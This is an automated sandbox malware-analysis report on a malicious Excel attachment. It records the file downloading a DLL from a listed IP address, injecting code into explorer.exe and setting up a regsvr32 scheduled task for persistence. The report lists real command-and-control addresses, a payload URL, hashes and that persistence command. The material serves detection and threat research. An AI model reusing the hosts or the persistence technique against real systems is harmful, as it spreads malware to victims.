                        Source: Yara match | File source: 13.2.regsvr32.exe.2a0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 14.2.explorer.exe.c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 7.2.explorer.exe.80000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000006.00000002.617600278.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000006.00000002.615656945.00000000003D0000.00000004.00000001.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000002.634139082.0000000010001000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000007.00000002.881366079.0000000000080000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000E.00000002.881374188.00000000000C0000.00000040.00020000.sdmp, type: MEMORY
                        Source: Yara match | File source: 0000000D.00000002.632447302.00000000002A0000.00000004.00000001.sdmp, type: MEMORY

                        Mitre Att&ck Matrix

                        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                        Valid Accounts | Command and Scripting Interpreter11 | Windows Service3 | Windows Service3 | Masquerading121 | Credential API Hooking1 | System Time Discovery1 | Remote Services | Credential API Hooking1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
                        Default Accounts | Scheduled Task/Job1 | Scheduled Task/Job1 | Process Injection413 | Disable or Modify Tools1 | LSASS Memory | Security Software Discovery11 | Remote Desktop Protocol | Archive Collected Data1 | Exfiltration Over Bluetooth | Ingress Tool Transfer12 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
                        Domain Accounts | Scripting2 | Logon Script (Windows) | Scheduled Task/Job1 | Modify Registry1 | Security Account Manager | Virtualization/Sandbox Evasion1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
                        Local Accounts | Service Execution2 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion1 | NTDS | Process Discovery3 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol21 | SIM Card Swap |  | Carrier Billing Fraud
                        Cloud Accounts | Native API1 | Network Logon Script | Network Logon Script | Process Injection413 | LSA Secrets | File and Directory Discovery2 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
                        Replication Through Removable Media | Exploitation for Client Execution32 | Rc.common | Rc.common | Scripting2 | Cached Domain Credentials | System Information Discovery15 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
                        External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information1 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
                        Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

                        Behavior Graph


                        Legend:

                        • Process
                        • Signature
                        • Created File
                        • DNS/IP Info
                        • Is Dropped
                        • Is Windows Process
                        • Number of created Registry Values
                        • Number of created Files
                        • Visual Basic
                        • Delphi
                        • Java
                        • .Net C# or VB.NET
                        • C, C++ or other language
                        • Is malicious
                        • Internet
                        behaviorgraph top1 signatures2 2 Behavior Graph ID: 492656 Sample: CompensationClaim-103319101... Startdate: 28/09/2021 Architecture: WINDOWS Score: 100 54 Found malware configuration 2->54 56 Multi AV Scanner detection for dropped file 2->56 58 Document exploit detected (drops PE files) 2->58 60 8 other signatures 2->60 9 EXCEL.EXE 194 32 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 48 94.140.112.126, 80 TELEMACHBroadbandAccessCarrierServicesSI Latvia 9->48 50 190.14.37.187, 49165, 80 OffshoreRacksSAPA Panama 9->50 52 185.141.27.213, 80 HSAE Netherlands 9->52 46 C:\Users\user\...\44467.9218096065[1].dat, PE32 9->46 dropped 76 Document exploit detected (UrlDownloadToFile) 9->76 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        68 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->68 70 Injects code into the Windows Explorer (explorer.exe) 24->70 72 Writes to foreign memory regions 24->72 74 2 other signatures 24->74 32 explorer.exe 8 1 24->32         started        process9 file10 78 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->78 80 Injects code into the Windows Explorer (explorer.exe) 29->80 82 Writes to foreign memory regions 29->82 86 2 other signatures 29->86 35 explorer.exe 8 1 29->35         started        44 C:\Users\user\Drezd.red, PE32 32->44 dropped 84 Uses cmd line tools excessively to alter registry or file data 32->84 38 reg.exe 1 32->38         started        40 reg.exe 1 32->40         started        signatures11 process12 signatures13 62 Uses cmd line tools excessively to alter registry or file 
data 35->62 64 Drops PE files to the user root directory 35->64 66 Uses schtasks.exe or at.exe to add and modify task schedules 35->66 42 schtasks.exe 35->42         started        process14


                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        No Antivirus matches

                        Dropped Files

                        Source | Detection | Scanner | Label
                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat | 16% | ReversingLabs | Win32.Trojan.Generic

                        Unpacked PE Files

                        Source | Detection | Scanner | Label
                        13.2.regsvr32.exe.1310000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2
                        6.2.regsvr32.exe.2a80000.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen2

                        Domains

                        No Antivirus matches

                        URLs

                        Source | Detection | Scanner | Label
                        http://www.%s.comPA | 0% | URL Reputation | safe
                        http://190.14.37.187/44467.9218096065.dat | 0% | Avira URL Cloud | safe
                        http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

                        Domains and IPs

                        Contacted Domains

                        No contacted domains info

                        Contacted URLs

                        Name | Malicious | Antivirus Detection | Reputation
                        http://190.14.37.187/44467.9218096065.dat | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://www.%s.comPA | regsvr32.exe, 00000006.00000002.616250434.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881681374.0000000002040000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.633036346.0000000000F20000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.881594655.0000000000E00000.00000002.00020000.sdmp | false | URL Reputation: safe | low
                        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000006.00000002.616250434.00000000024B0000.00000002.00020000.sdmp, explorer.exe, 00000007.00000002.881681374.0000000002040000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.633036346.0000000000F20000.00000002.00020000.sdmp | false | (none) | high
                        http://servername/isapibackend.dll | regsvr32.exe, 00000005.00000002.619032737.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 00000006.00000002.615803827.0000000001FA0000.00000002.00020000.sdmp, regsvr32.exe, 00000008.00000002.619851177.0000000001CD0000.00000002.00020000.sdmp, regsvr32.exe, 0000000A.00000002.620572592.0000000001D10000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.635427701.0000000000910000.00000002.00020000.sdmp, regsvr32.exe, 0000000D.00000002.632565051.00000000009E0000.00000002.00020000.sdmp | false | Avira URL Cloud: safe | low

                          Contacted IPs


                          Public

                          IP | Domain | Country | ASN | ASN Name | Malicious
                          185.141.27.213 | unknown | Netherlands | 60117 | HSAE | false
                          190.14.37.187 | unknown | Panama | 52469 | OffshoreRacksSAPA | false
                          94.140.112.126 | unknown | Latvia | 3212 | TELEMACHBroadbandAccessCarrierServicesSI | false

                          General Information

                          Joe Sandbox Version:33.0.0 White Diamond
                          Analysis ID:492656
                          Start date:28.09.2021
                          Start time:22:06:50
                          Joe Sandbox Product:CloudBasic
                          Overall analysis duration:0h 13m 21s
                          Hypervisor based Inspection enabled:false
                          Report type:light
                          Sample file name:CompensationClaim-1033191014-09282021.xls
                          Cookbook file name:defaultwindowsofficecookbook.jbs
                          Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                          Number of new started processes analysed:22
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • HDC enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Detection:MAL
                          Classification:mal100.troj.expl.evad.winXLS@25/6@0/3
                          EGA Information:Failed
                          HDC Information:
                          • Successful, ratio: 18.6% (good quality ratio 17.5%)
                          • Quality average: 76.7%
                          • Quality standard deviation: 27.2%
                          HCA Information:
                          • Successful, ratio: 86%
                          • Number of executed functions: 0
                          • Number of non-executed functions: 0
                          Cookbook Comments:
                          • Adjust boot time
                          • Enable AMSI
                          • Found application associated with file extension: .xls
                          • Changed system and user locale, location and keyboard layout to English - United States
                          • Found Word or Excel or PowerPoint or XPS Viewer
                          • Attach to Office via COM
                          • Scroll down
                          • Close Viewer
                          Warnings:
                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                          • TCP Packets have been reduced to 100
                          • Not all processes were analyzed, report is missing behavior information
                          • Report size getting too big, too many NtSetInformationFile calls found.
                          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/492656/sample/CompensationClaim-1033191014-09282021.xls

                          Simulations

                          Behavior and APIs

                          Time | Type | Description
                          22:08:54 | API Interceptor | 29x Sleep call for process: regsvr32.exe modified
                          22:08:56 | API Interceptor | 861x Sleep call for process: explorer.exe modified
                          22:08:59 | API Interceptor | 1x Sleep call for process: schtasks.exe modified
                          22:09:00 | Task Scheduler | Run new task: pajjxwey path: regsvr32.exe s>-s "C:\Users\user\Drezd.red"

                          Joe Sandbox View / Context

                          IPs

                          No context

                          Domains

                          No context

                          ASN

                          Match | Associated Sample Name / URL | Detection | Context
                          HSAE | xls.xls | malicious | 185.183.96.67
                          | Compensation-1214892625-09272021.xls | malicious | 185.183.96.67
                          | Compensation-2100058996-09272021.xls | malicious | 185.183.96.67
                          | Compensation-1657705079-09272021.xls | malicious | 185.183.96.67
                          | Compensation-1214892625-09272021.xls | malicious | 185.183.96.67
                          | #Qbot downloader.xls | malicious | 185.183.96.67
                          | Compensation-2308017-09272021.xls | malicious | 185.183.96.67
                          | Compensation-1730406737-09272021.xls | malicious | 185.183.96.67
                          | KHI13mrm4c.exe | malicious | 185.183.98.2
                          | Copy of Payment-228607772-09222021.xls | malicious | 185.82.202.248
                          | NJS4hNBeUR.exe | malicious | 185.198.57.68
                          | rQoEGMGufv.exe | malicious | 185.45.192.203
                          | 5ya8R7LxXl.exe | malicious | 185.45.192.203
                          | Uz2eSldsZe.exe | malicious | 185.45.192.203
                          | SWIFT_COPY.htm | malicious | 194.36.191.196
                          | 3hTS09wZ7G.exe | malicious | 185.183.96.3
                          | 040ba58b824e36fc9117c1e3c8b651d9e4dc3fe12b535.exe | malicious | 185.183.96.3
                          | OC2Z0JbqfA.exe | malicious | 185.183.96.3
                          | 89o9iHBGiB.exe | malicious | 185.183.96.3
                          | DWVByMCYL8.exe | malicious | 185.183.96.3

                          JA3 Fingerprints

                          No context

                          Dropped Files

                          No context

                          Created / dropped Files

                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44467.9218096065[1].dat
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):259072
                          Entropy (8bit):5.307481689640455
                          Encrypted:false
                          SSDEEP:3072:0PQdEOItJPxluIalXQOr+nxQNBO0jTL23i7eBnaVImWeqSR4G78SYSuDSMv6UWo:MUr+nxQNBO0jf2Ee5aSzeF4DSY7Dh6e
                          MD5:EBEC2F5AC1E5F9D51D12FF7131795C35
                          SHA1:2C07EE3F23FD2A62373412D67DDBCA312445D29E
                          SHA-256:405E8907B3775351B266445FAE051055A10D97FB89ED926B5FA083F32028F5D4
                          SHA-512:0152F35C26DA5DAD857A5B8C23BD802D9B730D91C1916A25374B957440971FA6A2716F3C3F20FDF5343B752CE152511EC0D54122CD494957673221A28864C99A
                          Malicious:true
                          Antivirus:
                          • Antivirus: ReversingLabs, Detection: 16%
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!.........................0................................'......................................0..p....`'.|....p'..............................................................................`'..............................text...j........................... ..`.edata..p....0......................@..@.data........@...`..................@....data...0.$..P...h...|..............@....rdatat.n....`'.....................@....rsrc........p'.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):162688
                          Entropy (8bit):4.254450821917616
                          Encrypted:false
                          SSDEEP:1536:C6LL3FNSc8SetKB96vQVCBumVMOej6mXmYarrJQcd1FaLcm48s:CSJNSc83tKBAvQVCgOtmXmLpLm4l
                          MD5:A14C77EBC9612D137C5C449C4C29D7D0
                          SHA1:4AEC86C6CB49ECF55901912335A6C73B904A737B
                          SHA-256:710FD6C039A9F994A82DCCEE89FA5D3D62205FE86D04CDF60B2C5BED4B23EF41
                          SHA-512:DEB21669E508B7F1CC77AC4CCDBCE313DC144D9313007DE63CC72082F27B8A00C4D91184244F8A4A58CAAE732681208AFFFEEA7D6E09D99A1BF250F09A7C8C54
                          Malicious:false
                          Preview: MSFT................Q................................#......$....... ...................d.......,...........X....... ...........L...........x.......@...........l.......4...........`.......(...........T...................H...........t.......<...........h.......0...........\.......$...........P...........|.......D...........p.......8...........d.......,...........X....... ...........L...........x.......@........ ..l ... ..4!...!...!..`"..."..(#...#...#..T$...$...%...%...%..H&...&...'..t'...'..<(...(...)..h)...)..0*...*...*..\+...+..$,...,...,..P-...-......|.......D/.../...0..p0...0..81...1...2..d2...2..,3...3...3..X4...4.. 5...5...5..L6...6...7..x7...7..@8.......8..............................$................................................................................x..xG..............T........................................... ...........................................................&!..............................................................................................
                          C:\Users\user\AppData\Local\Temp\VBE\RefEdit.exd
                          Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                          File Type:data
                          Category:dropped
                          Size (bytes):15676
                          Entropy (8bit):4.532462039791388
                          Encrypted:false
                          SSDEEP:192:+xlA11DxzCOtHIT6P20eChgZjTdZ3HJV8L1I17EMBkDXrq9LwGGLVbkLde:+38xesT20lheZ3waE5D7qxIxkxe
                          MD5:D08B9B38579D2301F3ABF029EEB8545B
                          SHA1:D1380C1207548DF964A9B1C999FA87E4FF97E6A0
                          SHA-256:4B37BB903B50AC6258A27242BBE2A15A6079D2E1449A307A09226C8F65D6494D
                          SHA-512:F36E10159EA955F9E9276C84AF87A0229421CBBA2FA27D287DBA54B1B2A6F1E14F07C229BD559BA8155325A2EF7A6C1D775A170A68EDEF1E0F634FFAEE7C3168
                          Malicious:false
                          Preview: MSFT................A...............................1............... ...................d...........,...................\...........H...4...........0... ...............................................................x...............................x.......................................................................................$"...............................................P..................................................$"..........................................0....P..,.........................0.....................%"..........................................H..."...................................................H.......(...................@...................P...............0.......`...............................p...X... ..................p...E..Z..............E.............F...........B........`..d......."E.............F........0..............F..........E........`.M...........CPf.........0..=.......01..)....w....<WI.......\.1Y........k...U........".......|...K..a...
                          C:\Users\user\Drezd.red
                          Process:C:\Windows\SysWOW64\explorer.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):259072
                          Entropy (8bit):2.3809766777560206
                          Encrypted:false
                          SSDEEP:1536:ar2VcC6MtqWgV3vAFNJ3JXS9n5SYCR44u029R+J:KC6MtAAFNJ5XC5SYCi02r+J
                          MD5:2668EB3008687022521F18765324BE31
                          SHA1:260C9F618207ACE946E94FB3EF7D000536BE0636
                          SHA-256:2382A58FAE508FA15BD5D02A39504B9C2898E8737BA417CB6EE54BD2A8804989
                          SHA-512:0A880B74E8137EF1ADA7CFA03871AA69105444296229C1B4B71412FED43156A0EFB5145B0944EC6C39AB65CB880E7514F74820958862A88AAA7CDD150EBEB399
                          Malicious:true
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....;a...........!.........................0................................'......................................0..p....`'.|....p'..............................................................................`'..............................text...j........................... ..`.edata..p....0......................@..@.data........@...`..................@....data...0.$..P...h...|..............@....rdatat.n....`'.....................@....rsrc........p'.....................@..@................................................................................................................................................................................................................................................................................................................................................................................................

                          Static File Info

                          General

                          File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Test, Last Saved By: Test, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:17:20 2015, Last Saved Time/Date: Tue Sep 28 08:54:40 2021, Security: 0
                          Entropy (8bit):7.0605219828223795
                          TrID:
                          • Microsoft Excel sheet (30009/1) 47.99%
                          • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                          • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                          File name:CompensationClaim-1033191014-09282021.xls
                          File size:140288
                          MD5:6c81ae06a5a6b766edca78e79caa44e9
                          SHA1:62771a1cf905d4346cc5d0a764eaf55e685a61d9
                          SHA256:b3e63f41617ed5bd3bb77a130be65bbbc500e927e7b21425d3d1fb484a7485bb
                          SHA512:3b109165a3cff4c755bbd56cabbd3dd6481d12e17bcf59df1b184f49690656e7b7591a9f48284a441f6b566501bead1ca324759be833edf20736259a214db4ec
                          SSDEEP:3072:Yk3hOdsylKlgxopeiBNhZFGzE+cL2kdAH11ScHlwFPYidH4C1TsNku0KRjkR+T99:Yk3hOdsylKlgxopeiBNhZF+E+W2kdAmi
                          File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                          File Icon

                          Icon Hash:e4eea286a4b4bcb4

                          Static OLE Info

                          General

                          Document Type:OLE
                          Number of OLE Files:1

                          OLE File "CompensationClaim-1033191014-09282021.xls"

                          Indicators

                          Has Summary Info:True
                          Application Name:Microsoft Excel
                          Encrypted Document:False
                          Contains Word Document Stream:False
                          Contains Workbook/Book Stream:True
                          Contains PowerPoint Document Stream:False
                          Contains Visio Document Stream:False
                          Contains ObjectPool Stream:
                          Flash Objects Count:
                          Contains VBA Macros:True

                          Summary

                          Code Page:1251
                          Author:Test
                          Last Saved By:Test
                          Create Time:2015-06-05 18:17:20
                          Last Saved Time:2021-09-28 07:54:40
                          Creating Application:Microsoft Excel
                          Security:0

                          Document Summary

                          Document Code Page:1251
                          Thumbnail Scaling Desired:False
                          Company:
                          Contains Dirty Links:False
                          Shared Document:False
                          Changed Hyperlinks:False
                          Application Version:1048576

                          Streams with VBA

                          VBA File Name: UserForm2, Stream Size: -1
                          General
                          Stream Path:_VBA_PROJECT_CUR/UserForm2
                          VBA File Name:UserForm2
                          Stream Size:-1
                          Data ASCII:
                          Data Raw:
                          VBA Code
                          VBA File Name: Module1, Stream Size: 1120
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Module1
                          VBA File Name:Module1
                          Stream Size:1120
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 03 f0 00 00 00 e2 02 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 10 03 00 00 d8 03 00 00 00 00 00 00 01 00 00 00 fb 18 3d fb 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          VBA File Name: Module5, Stream Size: 3869
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Module5
                          VBA File Name:Module5
                          Stream Size:3869
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . % . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 01 f0 00 00 00 e2 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff e9 02 00 00 5d 0c 00 00 00 00 00 00 01 00 00 00 fb 18 e3 25 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          VBA File Name: Sheet1, Stream Size: 991
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                          VBA File Name:Sheet1
                          Stream Size:991
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . 9 . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 fb 18 b4 39 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          VBA File Name: ThisWorkbook, Stream Size: 2393
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                          VBA File Name:ThisWorkbook
                          Stream Size:2393
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . M . . . . . . . . . . . . . r S . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 82 04 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 89 04 00 00 4d 07 00 00 00 00 00 00 01 00 00 00 fb 18 72 53 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code
                          VBA File Name: UserForm2, Stream Size: 1181
                          General
                          Stream Path:_VBA_PROJECT_CUR/VBA/UserForm2
                          VBA File Name:UserForm2
                          Stream Size:1181
                          Data ASCII:. . . . . . . . . V . . . . . . . L . . . . . . . ] . . . . . . . . . . . . . . . . . . J . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                          Data Raw:01 16 03 00 00 f0 00 00 00 56 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 5d 03 00 00 b1 03 00 00 00 00 00 00 01 00 00 00 fb 18 b2 4a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          VBA Code

                          Streams

                          Stream Path: \x1CompObj
                          File Type: data
                          Stream Size: 108
                          Entropy: 4.18849998853
                          Base64 Encoded: True
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . M i c r o s o f t E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                          Stream Path: \x5DocumentSummaryInformation
                          File Type: data
                          Stream Size: 244
                          Entropy: 2.65175227267
                          Base64 Encoded: False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
                          Stream Path: \x5SummaryInformation
                          File Type: data
                          Stream Size: 208
                          Entropy: 3.33231709703
                          Base64 Encoded: False
                          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . X . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T e s t . . . . . . . . . . . . T e s t . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . x s . . . . . @ . . . . % . > . . . . . . . . . . .
                          Stream Path: Workbook
                          File Type: Applesoft BASIC program data, first line number 16
                          Stream Size: 111238
                          Entropy: 7.57013249535
                          Base64 Encoded: True
                          Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . V d g t j g h k B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . V e 1 8 . . . . . . . X . @
                          Stream Path: _VBA_PROJECT_CUR/PROJECT
                          File Type: ASCII text, with CRLF line terminators
                          Stream Size: 698
                          Entropy: 5.28132485046
                          Base64 Encoded: True
                          Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . M o d u l e = M o d u l e 5 . . B a s e C l a s s = U s e r F o r m 2 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0
                          Stream Path: _VBA_PROJECT_CUR/PROJECTlk
                          File Type: dBase IV DBT, blocks size 0, block length 17920, next free block index 65537
                          Stream Size: 30
                          Entropy: 1.37215976263
                          Base64 Encoded: False
                          Data ASCII:. . . . . . " E . . . . . . . . . . . . . F . . . . . . . .
                          Stream Path: _VBA_PROJECT_CUR/PROJECTwm
                          File Type: data
                          Stream Size: 140
                          Entropy: 3.43277227638
                          Base64 Encoded: False
